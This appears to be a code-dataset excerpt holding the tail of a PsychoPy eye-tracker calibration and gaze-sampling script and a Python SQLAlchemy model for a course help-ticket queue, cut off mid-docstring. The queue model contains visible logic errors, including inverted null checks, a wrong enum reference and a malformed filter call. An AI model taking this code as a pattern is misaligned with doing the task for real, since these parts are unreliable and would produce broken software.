ian.newman@usask.ca\n#\n# -----------------------------------------------------------------------\n\n\n# ---------------------------------------------\n# ---- Import Libraries\n# ---------------------------------------------\n\nfrom psychopy import visual, core, event # sound, gui, data, logging\nimport os\n# import sys\n# import csv\n# from itertools import product\n\n# eye-tracking libraries\nfrom iViewXAPI import * # iViewX library\nfrom iViewXAPIReturnCodes import *\n\n# ---------------------------------------------\n\n\n# ---------------------------------------------\n# ---- RunCalibration (not totally finished: change calibration arguments and file logging)\n# ---------------------------------------------\n\ndef run_calibration(participant=0, max_tries=10, deviation=1):\n\n \"\"\"\n Function: connect to SMI eye-tracker, calibrate, validate, and create log file\n Arguments:\n participant = current participant number\n max_tries = maximum calibration attempts\n deviation = acceptable horizontal and vertical deviation from the target\n \"\"\"\n\n # variables\n calibrated = False\n attempts = 1\n max_attempts = max_tries\n calibration_deviation = deviation\n\n # set up the log file\n calibration_dir = os.getcwd()\n calibration_filename = calibration_dir + os.sep + \"data\" + os.sep + str(participant) + \"_calibration\" + \".txt\"\n calibration_log = open(calibration_filename, 'w')\n res = iViewXAPI.iV_SetLogger(c_int(1), c_char_p(str(participant) + \"_log.txt\"))\n\n # connect to iViewX\n res = iViewXAPI.iV_Connect(c_char_p('127.0.0.1'), c_int(4444), c_char_p('127.0.0.1'), c_int(5555))\n if res != 1:\n HandleError(res)\n exit(0)\n\n # log system info\n res = iViewXAPI.iV_GetSystemInfo(byref(systemData))\n calibration_log.write(\"iV_GetSystemInfo: \" + str(res) + \"\\n\")\n calibration_log.write(\"Samplerate: \" + str(systemData.samplerate) + \"\\n\")\n calibration_log.write(\n \"iViewX Version: \" + str(systemData.iV_MajorVersion) + \".\" + str(systemData.iV_MinorVersion) + \".\" + str(\n systemData.iV_Buildnumber) + \"\\n\")\n calibration_log.write(\n \"iViewX API Version: \" + str(systemData.API_MajorVersion) + \".\" + str(systemData.API_MinorVersion) + \".\" + str(\n systemData.API_Buildnumber) + \"\\n\")\n\n # create calibration parameters\n \"\"\"\n Arguments:\n 1. method\n 2. visualization\n 3. display device\n 4. speed\n 5. autoaccept\n 6. foreground brightness\n 7. background brightness\n 8. target shape\n 9. target size\n 10. target filename\n \"\"\"\n calibrationData = CCalibration(5, 1, 0, 0, 1, 250, 0, 2, 20, b\"\")\n res = iViewXAPI.iV_SetupCalibration(byref(calibrationData))\n calibration_log.write(\"Setup Calibration: \" + str(res) + \"\\n\")\n\n # calibrate eye-tracker within accepted deviation\n while not calibrated and attempts < max_attempts:\n\n cali = iViewXAPI.iV_Calibrate()\n vali = iViewXAPI.iV_Validate()\n acc = iViewXAPI.iV_GetAccuracy(byref(accuracyData), 1)\n\n LX = accuracyData.deviationLX\n LY = accuracyData.deviationLY\n RX = accuracyData.deviationRX\n RY = accuracyData.deviationRY\n\n if all([\n LX < calibration_deviation,\n LY < calibration_deviation,\n RX < calibration_deviation,\n RY < calibration_deviation,\n LX > 0.0,\n LY > 0.0,\n RX > 0.0,\n RY > 0.0\n ]):\n calibrated = True\n\n # create window to print results\n calibration_win = visual.Window(\n size=(1920, 1200), fullscr=True, screen=0,\n allowGUI=False, allowStencil=False,\n monitor='testMonitor', color=u'black', colorSpace='rgb',\n blendMode='avg', useFBO=True)\n\n calibration_text = (\"Deviation left x: \" + str(LX) + \"\\n\"\n \"Deviation left y: \" + str(LY) + \"\\n\"\n \"Deviation right x: \" + str(RX) + \"\\n\"\n \"Deviation right y: \" + str(RY) + \"\\n\\n\\n\"\n \"Calibration Success: \" + str(calibrated)\n )\n\n calibration_rerun_text = (\"Calibration will begin again shortly.\\n\\n\"\n \"Please remain as still as possible. Do your best to focus directly on the dot.\\n\\n\\n\"\n \"Attempts remaining: \" + str(max_attempts - attempts)\n )\n\n calibration_results = visual.TextStim(win=calibration_win,\n text=calibration_text,\n pos=(0, 0.25),\n height=0.075,\n color=u'white', colorSpace='rgb',\n wrapWidth=1.5)\n\n calibration_rerun = visual.TextStim(win=calibration_win,\n text=calibration_rerun_text,\n pos=(0, 0.25),\n height=0.075,\n color=u'white', colorSpace='rgb',\n wrapWidth=1.5)\n\n # display results to screen\n calibration_results.draw()\n calibration_win.flip()\n core.wait(5)\n\n if not calibrated:\n calibration_rerun.draw()\n calibration_win.flip()\n core.wait(5)\n\n calibration_win.close()\n attempts += 1\n\n # write to log file\n if calibrated:\n calibration_log.write(\"Calibration Success: \" + str(cali) + \"\\n\")\n calibration_log.write(\"Validation Success: \" + str(vali) + \"\\n\")\n calibration_log.write(\"Accuracy: \" + str(acc) + \"\\n\")\n calibration_log.write(\"deviationXLeft: \" + str(accuracyData.deviationLX) + \"\\n\")\n calibration_log.write(\"deviationYLeft: \" + str(accuracyData.deviationLY) + \"\\n\")\n calibration_log.write(\"deviationXRight: \" + str(accuracyData.deviationRX) + \"\\n\")\n calibration_log.write(\"deviationYRight: \" + str(accuracyData.deviationRY) + \"\\n\")\n res = iViewXAPI.iV_ShowTrackingMonitor()\n calibration_log.write(\"Tracking Monitor: \" + str(res) + \"\\n\")\n calibration_log.close()\n\n\n# ---------------------------------------------\n\n\ndef timecourse_eyetracking(xPos_left, yPos_left, xPos_right, yPos_right,\n pDiam_left, pDiam_right, t_sample, t_num, sample_rate, key_list):\n\n eyetrack_timecourse = True\n counter = 1\n event.clearEvents(eventType='keyboard') # clear keyboard buffer\n \n # init timer\n timer = core.Clock() \n timer.reset()\n t0 = start = timer.getTime()\n t1 = t0 + sample_rate\n rt = 0\n key_press = event.BuilderKeyResponse()\n\n while eyetrack_timecourse:\n \n # get timestamp for current loop iteration\n timestamp = timer.getTime()\n \n # check for response\n key_press = event.getKeys(keyList=key_list)\n \n # if response given, end loop\n if len(key_press) > 0:\n rt = timer.getTime()\n eyetrack_timecourse = False\n \n # gather eye-tracking data here\n if timestamp > t1:\n iViewXAPI.iV_GetSample(byref(sampleData))\n t1 += sample_rate # increment t1 by the sample rate\n t = timestamp - start\n xPos_left.append(sampleData.leftEye.gazeX)\n xPos_right.append(sampleData.rightEye.gazeX)\n yPos_left.append(sampleData.leftEye.gazeY)\n yPos_right.append(sampleData.rightEye.gazeY)\n pDiam_left.append(sampleData.leftEye.diam)\n pDiam_right.append(sampleData.rightEye.diam)\n t_sample.append(t)\n t_num.append(counter)\n counter += 1\n \n return key_press, rt\n\n\n\n# unused:\n # left_eye = CEye(0,0,0)\n # right_eye = CEye(0,0,0)\n # eye_sample = CSample(0,left_eye,right_eye,0)\n # position_x_left = eye_sample.leftEye.gazeX\n # print \"position x left: \" + str(position_x_left)\n # iViewXAPI.iV_GetSample(byref(sampleData))\n # position_x_left = sampleData.leftEye.gazeX\n # print \"position x left: \" + str(position_x_left)\n\n # key_pressed = psychopy.event.waitKeys(keyList=[\"left\", \"right\"])\n # change to getkeys loop, possibly all within a function call\n # it would take the lists and the sample rate as arguments (so 9 arguments already, plus maybe the sample data)\n\n # xPos_left.append(sampleData.leftEye.gazeX)\n # xPos_right.append(sampleData.rightEye.gazeX)\n # yPos_left.append(sampleData.leftEye.gazeY)\n # yPos_right.append(sampleData.rightEye.gazeY)\n # pDiam_left.append(sampleData.leftEye.diam)\n # pDiam_right.append(sampleData.rightEye.diam)\n # t_sample.append(t0)\n # t_num.append(counter)\n\n\"\"\"\n while len(key_pressed) < 1: # add counter with t_number (0 to N)\n\n # sample \n #eye_sample = iV_GetSample()\n\n # diam = pupil diamter, gazeX/Y = position on screen\n position_x_left = eye_sample.leftEye.gazeX\n print \"position x left: \" + position_x_left\n\n position_y_left = eye_sample.leftEye.gazeY\n position_x_right = eye_sample.rightEye.gazeX\n position_y_right = eye_sample.rightEye.gazeY\n diameter_pupil_left = eye_sample.leftEye.diam\n diameter_pupil_right = eye_sample.rightEye.diam\n\n timestamp = trialClock.getTime() # iV_GetCurrentTimestamp()\n t_num = counter\n\n #if timestamp > t1: # not sure if this if statement is strictly necessary yet (may be redundant code here)\n t1 += sample_rate\n t = timestamp - start\n x_left = position_x_left\n x_right = position_x_right\n y_left = position_y_left\n y_right = position_y_right\n pd_left = diameter_pupil_left\n pd_right = diameter_pupil_right\n\n xList_left.append(x_left)\n xList_right.append(x_right)\n yList_left.append(y_left)\n yList_right.append(y_right)\n pList_left.append(pd_left)\n pList_right.append(pd_right)\n tList.append(t)\n tList_num.append(t_num)\n # THEN: save these arrays to the trial handler\n\n counter += 1\n\"\"\"","repo_name":"irnewman/nir","sub_path":"eye.py","file_name":"eye.py","file_ext":"py","file_size_in_byte":10749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43119542359","text":"from __future__ import annotations\nfrom typing import List, Optional, Dict\nfrom enum import Enum\nfrom datetime import timedelta\nfrom ..utils.time import TimeUtil\n\nfrom ...setup import db\n\nfrom .user import User\nfrom .course import Course\nfrom .ticket import Ticket, TicketTag, HelpType\nfrom .ticket import Status as t_status\nfrom .ticket_feedback import TicketFeedback\nfrom .events.ticket_event import TicketEvent, EventType\nfrom .events.queue_login_event import QueueLoginEvent, ActionType, EType\n\nfrom .news_feed_post import NewsFeedPost\nfrom .enrolled_course import EnrolledCourse\nfrom .enrolled_course import Status as EStatus\nfrom .enrolled_course import Role as ERole\n\n\n\"\"\"\nDefine Constant\n\"\"\"\nDEFAULT_WAIT_TIME = '0:12:00' # 12min\nMIN_WAIT_TIME = '0:05:00' # 5min\n\n\nclass Status(Enum):\n \"\"\"\n The status of the queue with the following options --> database value:\\n\n OPEN --> 0\\n\n LOCKED --> 1\\n\n CLOSED --> 2\\n\n @author YixuanZhou\n \"\"\"\n OPEN = 0\n LOCKED = 1\n CLOSED = 2\n\n\nclass Queue(db.Model):\n \"\"\"\n The main queue handler for the queue page.\\n\n Fields: \\n\n id --> The id of the queue, unique primary key.\\n\n status --> The status of the queue, not nullable.\\n\n highCapacityEnabled --> Boolean if the high capacity is on, not nullable.\\n\n highCapacityThreshold --> The threshold to identiify if the queue is\\\n at high capacity, not nullable.\\n\n highCapacityMessage --> The message to show when high capcity for tutors.\\n\n highCapacityWarning --> The warning message to show when\\\n high capacity for students.\\n\n defaultTagsEnabled --> If the tag of the queue is enabled. ??? \\n\n ticketCooldown --> Int for the time to wait between two tickets\n submisions.\\n\n @author YixuanZhou\n \"\"\"\n __tablename__ = 'Queue'\n id = db.Column(db.Integer, primary_key=True, nullable=False)\n status = db.Column(db.Integer, nullable=False, default=Status.CLOSED)\n high_capacity_enable = db.Column(db.Boolean, nullable=False, default=True)\n high_capacity_threshold = db.Column(db.Integer, nullable=False,\n default=25)\n high_capacity_message = db.Column(db.Text, nullable=False,\n default='The queue is currently at high \\\n capacity. The tutors will be \\\n limiting their time to 5\\\n minutes per student.')\n high_capacity_warning = db.Column(db.Text, nullable=False,\n default='The queue is currently very busy. \\\n You may not be helped before \\\n tutor hours end.')\n ticket_cool_down = db.Column(db.Integer, nullable=False, default=10)\n queue_lock = db.Column(db.Boolean, nullable=False, default=False)\n\n def __init__(self, **kwargs):\n \"\"\"\n The constructor the queue object.\\n\n Inputs:\\n\n high_capacity_enabled --> Whether to enable high capacity or not.\n Default is true. \\n\n high_capacity_enabled --> High capacity message. Default is provided.\\n\n high_Capacity_waring --> The Warning to the student.\n Default is provided.\\n\n ticket_cooldown --> The cooldown time for the ticket.\\n\n \"\"\"\n super(Queue, self).__init__(**kwargs)\n\n def save(self):\n \"\"\"\n Save the object that is modified into the database.\\n\n \"\"\"\n db.session.commit()\n\n def update_ticket(self, student: User, title: str,\n description: str, room: str,\n workstation: str, is_private: bool,\n help_type: HelpType,\n tag_list: List[TicketTag]) -> Ticket:\n \"\"\"\n Update a ticket if exist or add.\\n\n Inputs:\\n\n student --> The student who submit the ticket.\\n\n title --> The title of the ticket.\\n\n description --> The description to the ticket.\\n\n room --> The room of this ticket is in.\\n\n workstation --> The workstaton ticket is at.\\n\n help_type --> The type of help needed.\\n\n tag_list --> The list of tags of the tickte.\\n\n Return:\\n\n The updated ticket.\\n\n \"\"\"\n old_ticket = Ticket.find_pending_ticket_by_student(queue=self,\n student=student)\n if not old_ticket:\n old_ticket.student_update(title=title, description=description,\n room=room, workstation=workstation,\n is_private=is_private,\n help_type=help_type,\n tag_list=tag_list)\n # Create a new Ticket Event\n te = TicketEvent(event_type=EventType.UPDATED,\n ticket_id=old_ticket.id,\n user_id=student.id)\n TicketEvent.add_to_db(te)\n return old_ticket\n else:\n return self.add_ticket(student=student, title=title,\n description=description, room=room,\n workstation=workstation,\n is_private=is_private,\n help_type=help_type, tag_list=tag_list)\n\n # Getter Methods for Queue Status\n def is_open(self) -> bool:\n \"\"\"\n Check if the queue is open.\\n\n Return:\\n\n bool value indicates queue is open or not.\\n\n \"\"\"\n return self.status == Status.OPEN.value\n\n def is_locked(self) -> bool:\n \"\"\"\n Check if the queue is locked.\\n\n Return:\\n\n bool value indicates queue is locked or not.\\n\n \"\"\"\n return self.status == Status.LOCKED.value\n\n def is_closed(self) -> bool:\n \"\"\"\n Check if the queue is closed.\\n\n Return:\\n\n bool value indicates queue is closed or not.\\n\n \"\"\"\n return self.status == Status.CLOSED.value\n\n # Status setter methods\n def open(self) -> None:\n \"\"\"\n Open the queue.\n \"\"\"\n self.status = Status.OPEN.value\n self.save()\n\n def lock(self) -> None:\n \"\"\"\n Lock the queue.\n \"\"\"\n self.status = Status.LOCKED.value\n self.save()\n\n def close(self) -> None:\n \"\"\"\n Close the queue.\n \"\"\"\n self.status = Status.CLOSED.value\n self.save()\n\n def clear_ticket(self) -> None:\n \"\"\"\n Clear all the tickets in the queue.\n \"\"\"\n unresolved_tickets = Ticket.find_all_tickets(self, [t_status.PENDING])\n\n for ticket in unresolved_tickets:\n ticket.mark_canceled()\n\n def __repr__(self) -> str:\n \"\"\"\n The to_string method to return which course this queue belongs to.\\n\n Returns:\\n\n The string representation of the course it belongs to.\\n\n \"\"\"\n course = Course.get_course_by_queue_id(self.id)\n if not course:\n return repr(course)\n else:\n return None\n\n def to_json(self) -> Dict[str, str]:\n '''\n Function that takes a queue object and returns it in dictionary.\\n\n Params: none\\n\n Returns: Dictionary of the user info\n '''\n ret = {}\n ret['queue_id'] = self.id\n ret['status'] = Status(self.status).name\n ret['high_capacity_enabled'] = self.high_capacity_enable\n ret['high_capacity_message'] = self.high_capacity_message\n ret['high_capacity_threshold'] = self.high_capacity_threshold\n ret['high_capacity_warning'] = self.high_capacity_warning\n ret['ticket_cooldown'] = self.ticket_cool_down\n return ret\n\n # Get tickets / tickets related sttaus\n def get_pending_tickets(self) -> List[Ticket]:\n \"\"\"\n Get all the penidng tickets of the queue.\\n\n Results:\\n\n A list of tickets that is pending in this queue.\\n\n \"\"\"\n return Ticket.find_all_tickets(self, status=[t_status.PENDING])\n\n def get_accepted_tickets(self) -> List[Ticket]:\n \"\"\"\n Get all the accepted tickets of the queue.\\n\n Results:\\n\n A list of tickets that is accepted in this queue.\\n\n \"\"\"\n return Ticket.find_all_tickets(self, status=[Status.ACCEPTED])\n\n def get_unresolved_tickets(self) -> List[Ticket]:\n \"\"\"\n Get all the unresolved tickets of the queue.\\n\n Results:\\n\n A list of tickets that is either pending or accepeted.\\n\n \"\"\"\n return Ticket.find_all_tickets(self, status=[t_status.PENDING,\n t_status.ACCEPTED])\n\n def get_resolved_tickets(self) -> List[Ticket]:\n \"\"\"\n Get all the resolved tickets of the queue.\\n\n Results:\\n\n A list of tickets that is resolved.\\n\n \"\"\"\n return Ticket.find_all_tickets(self, status=[t_status.RESOLVED])\n\n def get_canceled_tickets(self) -> List[Ticket]:\n \"\"\"\n Get all the canceled tickets of the queue.\\n\n Results:\\n\n A list of tickets that is canceled.\\n\n \"\"\"\n return Ticket.find_all_tickets(self, status=[t_status.CANCELED])\n\n def is_at_high_capacity(self) -> bool:\n \"\"\"\n Check if the queue is at high capacity.\\n\n Return:\\n\n bool value indicates queue is at high capacity or not.\\n\n \"\"\"\n threshold = self.high_capacity_threshold\n return self.high_capacity_enabled and\\\n len(self.get_unresolved_tickets(self)) > threshold\n\n def get_closed_ticktes_history(self, page_num: int = 0,\n num_per_page: int = 10) -> List[Ticket]:\n \"\"\"\n Get the closed tickte history of page.\\n\n Inputs:\\n\n page_num --> The page to start looking at, default 0.\\n\n num_per_page --> The number of entries to list per page, default 10.\\n\n Returns:\\n\n List of closed tickets history.\\n\n \"\"\"\n offset = page_num * num_per_page\n return Ticket.find_ticket_history_with_offset(queue=self,\n offset=offset,\n limit=num_per_page)\n\n def get_closed_ticket_history_for(self, student: User, page_num: int = 0,\n num_per_page: int = 10) \\\n -> List[Ticket]:\n \"\"\"\n Get the closed tickte history of page for a student.\\n\n Inputs:\\n\n student --> The User object for the student.\\n\n page_num --> The page to start looking at, default 0.\\n\n num_per_page --> The number of entries to list per page, default 10.\\n\n Returns:\\n\n List of closed tickets history for a student.\\n\n \"\"\"\n offset = page_num * num_per_page\n return Ticket.find_ticket_history_with_offset(queue=self,\n offset=offset,\n limit=num_per_page,\n student=student)\n\n def get_pending_ticket_for(self, student: User) -> Optional[Ticket]:\n \"\"\"\n Get a pending ticket for a certain student on this queue.\n (There should only be one pending ticket).\n Inputs:\\n\n student -> The User object for the student.\\n\n Returns:\\n\n The pending ticket of the student on this queue.\\n\n \"\"\"\n return Ticket.find_all_tickets_by_student(queue=self, student=student,\n status=[t_status.PENDING])[0]\n\n def get_accepted_ticket_for(self, student: User) -> Optional[Ticket]:\n \"\"\"\n Get an accepted ticket for a certain student on this queue.\n (There should only be one pending ticket).\n Inputs:\\n\n student -> The User object for the student.\\n\n Returns:\\n\n The pending ticket of the student on this queue.\\n\n \"\"\"\n return Ticket.\\\n find_all_tickets_by_student(queue=self, student=student,\n status=[t_status.ACCEPTED])[0]\n\n def get_unresolved_ticket_for(self, student: User) -> Optional[Ticket]:\n \"\"\"\n Get an unresolved ticket for a certain student on this queue.\n (There should only be one pending ticket).\n Inputs:\\n\n student -> The User object for the student.\\n\n Returns:\\n\n The pending ticket of the student on this queue.\\n\n \"\"\"\n return Ticket.find_all_tickets_by_student(queue=self, student=student,\n status=[t_status.ACCEPTED,\n t_status.PENDING])[0]\n\n def get_resolved_ticket_for(self, student: User) -> List[Ticket]:\n \"\"\"\n Get an resolved ticket for a certain student on this queue.\n Inputs:\\n\n student -> The User object for the student.\\n\n Returns:\\n\n A list of tickets of the student on this queue that are resolved.\\n\n \"\"\"\n return Ticket.find_all_tickets_by_student(queue=self, student=student,\n status=[t_status.RESOLVED])\n\n def get_canceled_ticket_for(self, student: User) -> List[Ticket]:\n \"\"\"\n Get an canceled ticket for a certain student on this queue.\n Inputs:\\n\n student -> The User object for the student.\\n\n Returns:\\n\n A list of tickets of the student on this queue that are resolved.\\n\n \"\"\"\n return Ticket.find_all_tickets_by_student(queue=self, student=student,\n status=[t_status.CANCELED])\n\n # Not implementing getLastResolvedTicketFor since it was only used\n # In tickets stats which is already handled.\n\n # Student bool query methods\n def has_pending_tickect_for(self, student: User) -> bool:\n \"\"\"\n Check whether this student has a pending ticket in this queue.\\n\n Inputs:\\n\n student --> The student object to look for.\\n\n Returns:\\n\n A bool value indicate whether there is or there is not a pending\n ticekct.\\n\n \"\"\"\n return self.get_pending_ticket_for(student) is not None\n\n def has_accepted_tickect_for(self, student: User) -> bool:\n \"\"\"\n Check whether this student has an accepted ticket in this queue.\\n\n Inputs:\\n\n student --> The student object to look for.\\n\n Returns:\\n\n A bool value indicate whether there is or there is not a pending\n ticekct.\\n\n \"\"\"\n return self.get_accepted_ticket_for(student) is not None\n\n def has_unresolved_tickect_for(self, student: User) -> bool:\n \"\"\"\n Check whether this student has an accepted ticket in this queue.\\n\n Inputs:\\n\n student --> The student object to look for.\\n\n Returns:\\n\n A bool value indicate whether there is or there is not a pending\n ticekct.\\n\n \"\"\"\n return self.get_unresolved_ticket_for(student) is not None\n\n # Grader Ticket Queuery Methods\n def get_ticket_accepted_by(self, grader: User, all: bool = False) \\\n -> List[Ticket]:\n \"\"\"\n Get tickes accepted by a grader with a choice of how many tickest to\n look for.\\n\n Inputs:\\n\n grader --> The grader to search for.\\n\n all --> Indicate you whether all tickets are returned.\\n\n Returns:\\n\n A list of tickects that is accepted by the grader\n (If only one is needed, the ticket will be the first one and\n the only one in the list).\\n\n \"\"\"\n if all:\n return Ticket.find_all_ticket_accpeted_by_grader(self,\n grader=grader)\n else:\n return [Ticket.find_ticket_accpeted_by_grader(self, grader=grader)]\n\n def get_ticket_resolved_by(self, grader: User) -> List[Ticket]:\n \"\"\"\n Get all the tickes resolved by a grader.\n Inputs:\\n\n grader --> The grader to search for.\\n\n Returns:\\n\n A list of tickest that is resolved by the grader.\\n\n \"\"\"\n tickets = Ticket.find_all_tickets_for_grader(self, grader)\n return list(filter(lambda x: x.status == t_status.RESOLVED), tickets)\n\n # Grader tickets bool query methods\n def has_ticket_accepted_by(self, grader: User) -> bool:\n return len(self.get_ticket_accepted_by(grader)) != 0\n\n # News feed post functionalities\n def get_news_feed_post(self, num: int = 20) -> List[NewsFeedPost]:\n \"\"\"\n Get the news feed post on the queue.\n Inputs:\\n\n num --> The number of news feed posts to look up for.\n Returns:\\n\n A list of news feed post.\n \"\"\"\n # return nfp.find...\n # Use the npf.find methods for the news_feed_post\n pass\n\n def get_archived_news_feed_post(self, num: int = 20)\\\n -> List[NewsFeedPost]:\n \"\"\"\n Get the archeived news feed posts for the queue.\n Inputs:\\n\n Inputs:\\n\n num --> The number of news feed posts to look up for.\n Returns:\\n\n A list of archived news feed post.\n \"\"\"\n # return nfp.find...\n # Use the npf.find methods for the news_feed_post\n pass\n\n # Impelementing Queue Stats\n def average_help_time(self, day: bool = True, hour: bool = False,\n start: str = None,\n end: str = None) -> timedelta:\n \"\"\"\n Get the average help time within a time period for tickes in\n the queue.\\n\n Inputs:\\n\n day --> To look for a day, default would be true.\\n\n hour --> To look for the recent hour, default would be false.\\n\n start --> The start time to look for. The default would be None.\n If start is provided, it has priority among hour and day.\\n\n end --> The end time to look for. The default would be None.\n end would only work if start is provied.\\n\n Returns:\\n\n A timedelta object representing the averge help time for the tickes\n given that period.\\n\n \"\"\"\n if not start:\n day = False\n hour = False\n tickets = Ticket.find_resolved_tickets_in(self, day=day,\n hour=hour,\n start=start, end=end)\n if len(tickets) < 5:\n return MIN_WAIT_TIME\n average_resolved_time = Ticket.average_resolved_time(tickets)\n return timedelta(seconds=average_resolved_time)\n\n # getExpectedTimeUntilAvailableTutor need a query method probably in\n # enrolled classs...\n def wait_time_for_next_tutor(self) -> timedelta:\n \"\"\"\n Get the expected wait time for the next tutor to be avaliable\n Returns:\\n\n The timedelta object for the expected time for the next tutor to be\n avaliale.\n \"\"\"\n ave_resolve_time = self.average_help_time(hour=True)\n # pending_num = self.get_pending_tickets()\n status, reason, active_tutors \\\n = EnrolledCourse.find_active_tutor_for(self.id)\n active_tutor_num = len(active_tutors)\n # Use enrolled course methods to find the num of active tutor.\n accepted_tickets = self.get_accepted_tickets()\n next_avaliable = timedelta(seconds=0)\n if active_tutor_num > len(accepted_tickets):\n return next_avaliable\n now = TimeUtil.get_current_time()\n # Simplifing the algorithm for now (without using utils)\n for ticket in accepted_tickets:\n current_help_time = now - ticket.accepted_at\n potential_time_need = ave_resolve_time - current_help_time\n next_avaliable = max(next_avaliable, potential_time_need)\n\n return next_avaliable\n\n def get_wait_time(self, student: User) -> Optional[timedelta]:\n \"\"\"\n Get the expected wait time for a student.\\n\n Inputs:\\n\n The student User object.\\n\n Returns:\\n\n The expected wait time for this student's ticket to be accepted.\n If this student has no tickect in the queue, return None.\\n\n \"\"\"\n student_ticket = self.get_pending_ticket_for(student=student)\n if student_ticket is None:\n return None\n # Get the number of tickets before this student's\n position = student_ticket.get_position()\n wait_time = timedelta(seconds=0)\n next_avaliable = self.wait_time_for_next_tutor()\n ave_help_time = self.average_help_time()\n wait_time = position * ave_help_time + next_avaliable\n\n return wait_time\n\n def get_queue_wait_time(self) -> timedelta:\n \"\"\"\n Given all the tickets in the queue, calculate the expected wait time\n if a ticket is submited now.\\n\n Return:\\n\n The expected wait time for a ticket that is submited now.\\n\n \"\"\"\n pending_num = len(self.get_pending_tickets())\n ave_time = self.average_help_time()\n\n return pending_num * ave_time\n\n # Static add method\n @staticmethod\n def add_to_db(queue: Queue):\n \"\"\"\n Add the queue feedback to the database.\\n\n Inputs:\\n\n queue --> the queue object created.\\n\n \"\"\"\n db.session.add(queue)\n db.session.commit()\n\n @staticmethod\n def update_queue_setting(queue_id: int,\n high_capacity_enable: bool,\n high_capacity_threshold: int,\n high_capacity_message: str,\n high_capacity_warning: str,\n ticket_cool_down: int,\n queue_lock: bool = True) -> Queue:\n q = Queue.get_queue_by_id(queue_id=queue_id)\n q.high_capacity_enable = high_capacity_enable\n if high_capacity_threshold:\n q.high_capacity_threshold = high_capacity_threshold\n if high_capacity_message:\n q.high_capacity_message = high_capacity_message\n if high_capacity_warning:\n q.high_capacity_warning = high_capacity_warning\n if ticket_cool_down:\n q.ticket_cool_down = ticket_cool_down\n q.queue_lock = queue_lock\n q.save()\n return q\n\n @staticmethod\n def create_queue(status: Status,\n high_capacity_enable: bool,\n high_capacity_threshold: int,\n high_capacity_message: str,\n high_capacity_warning: str,\n ticket_cool_down: int,\n queue_lock: bool = True):\n \"\"\"\n Create a new queue to the database.\\n\n \"\"\"\n status = status.value\n queue = Queue(status=status,\n high_capacity_enable=high_capacity_enable,\n high_capacity_threshold=high_capacity_threshold,\n high_capacity_message=high_capacity_message,\n high_capacity_warning=high_capacity_warning,\n ticket_cool_down=ticket_cool_down,\n queue_lock=queue_lock)\n Queue.add_to_db(queue)\n return queue\n\n @staticmethod\n def get_queue_by_id(queue_id: int) -> Optional(Queue):\n \"\"\"\n Find the queue by the queue_id.\\n\n Inputs:\\n\n queue_id --> The id of the queue to look for.\\n\n Returns:\\n\n The queue object, return None if it is not in the database.\\n\n \"\"\"\n return Queue.query.filter_by(id=queue_id).first()\n\n # None Memeber Queue Methods\n @staticmethod\n def grader_login(queue_id: int, grader_id: int,\n action_type: ActionType =\n ActionType.MANUAL.value) -> (bool, str):\n \"\"\"\n Login a grader when the grader login to he queue.\\n\n Inputs:\\n\n queue --> The queue that the grader is logging in.\\n\n grader --> The grader that is logging in.\\n\n action_type --> The type of action for logging in, default MANUAL.\\n\n Return:\\n\n True or false indicates whether the function is successful.\n \"\"\"\n queue = Queue.get_queue_by_id(queue_id)\n if not queue:\n return False, 'Queue Not Found'\n course = Course.get_course_by_queue_id(queue_id)\n if not course:\n return False, 'Course Not Found'\n grader = EnrolledCourse.find_user_in_course(user_id=grader_id,\n course_id=course.id)\n if not grader:\n return False, 'User Not Found'\n grader.change_status(EStatus.ACTIVE)\n event = QueueLoginEvent.create_login_event(event_type=EType.LOGIN,\n action_type=action_type,\n grader_id=grader_id,\n queue_id=queue_id)\n queue.open()\n return True, 'Success'\n\n @staticmethod\n def grader_logout(queue_id: int, grader_id: int,\n action_type: ActionType.MANUAL.value) -> [bool, str]:\n \"\"\"\n Logout a grader when the grader logout from queue.\\n\n Inputs:\\n\n queue --> The queue that the grader is logging out.\\n\n grader --> The grader that is logging out.\\n\n action_type --> The type of action for logging out.\\n\n Return:\\n\n True or false indicates whether it the function runs successfully.\n A string that tells what is the status.\n \"\"\"\n queue = Queue.get_queue_by_id(queue_id)\n if not queue:\n return False, 'Queue Not Found'\n course = Course.get_course_by_queue_id(queue_id)\n if not course:\n return False, 'course Not Found'\n grader = EnrolledCourse.find_user_in_course(user_id=grader_id,\n course_id=course.id)\n if not grader:\n return False, 'Course Not Found'\n grader.change_status(EStatus.INACTIVE)\n event = QueueLoginEvent.create_login_event(event_type=EType.LOGOUT,\n action_type=action_type,\n grader_id=grader.id,\n queue_id=queue.id\n )\n s, r, grader = EnrolledCourse.find_active_tutor_for(queue.id)\n if len(grader) == 0:\n queue.lock()\n return True, 'Success'\n\n @staticmethod\n def accept_ticket(queue_id: int, ticket_id: int,\n grader_id: int) -> (bool, str):\n \"\"\"\n Accept a ticket.\\n\n Inputs:\\n\n queue_id --> The id of the course that we are in.\\n\n ticket_id --> The id of the ticket to be accepted.\\n\n grader_id --> The id of the grader to accept the ticket.\\n\n Return:\\n\n Whether the operation successed or not.\n \"\"\"\n course_id = Course.get_course_by_queue_id(queue_id=queue_id)\n e_grader = EnrolledCourse.find_user_in_course(user_id=grader_id,\n course_id=course_id)\n if e_grader.get_role() not in [ERole.INSTRUCTOR, ERole.GRADER]:\n return (False, 'You cant take the ticket')\n if e_grader.get_status() != EStatus.ACTIVE:\n return (False, 'The user is currently busy')\n t = Ticket.get_ticket_by_id(ticket_id)\n t.mark_accepted_by(e_grader.id)\n e_grader.change_status(EStatus.BUSY)\n return (True, 'Ticket Accepted')\n\n @staticmethod\n def resolve_ticket(queue_id: int, ticket_id: int,\n grader_id: int) -> (bool, str):\n \"\"\"\n Reolve a ticket.\\n\n Inputs:\\n\n queue_id --> The id of the course that we are in.\\n\n ticket_id --> The id of the ticket to be accepted.\\n\n grader_id --> The id of the grader to accept the ticket.\\n\n Return:\\n\n Whether the operation successed or not.\n \"\"\"\n course_id = Course.get_course_by_queue_id(queue_id=queue_id)\n e_grader = EnrolledCourse.find_user_in_course(user_id=grader_id,\n course_id=course_id)\n if e_grader.get_role() not in [ERole.INSTRUCTOR, ERole.GRADER]:\n return (False, 'You cant resolve the ticket')\n t = Ticket.get_ticket_by_id(ticket_id)\n accepter = EnrolledCourse.find_user_in_course(user_id=t.get_grader_id,\n course_id=course_id)\n t.mark_resolved()\n accepter.change_status(EStatus.ACTIVE)\n return (True, 'Ticket Resolved')\n\n @staticmethod\n def find_current_queue_for_user(user_id: int) -> (bool, str, List[Queue]):\n \"\"\"\n Find all the queues that this user is in currently.\n Inputs:\\n\n user --> The User object to look for.\n Returns:\\n\n bool --> 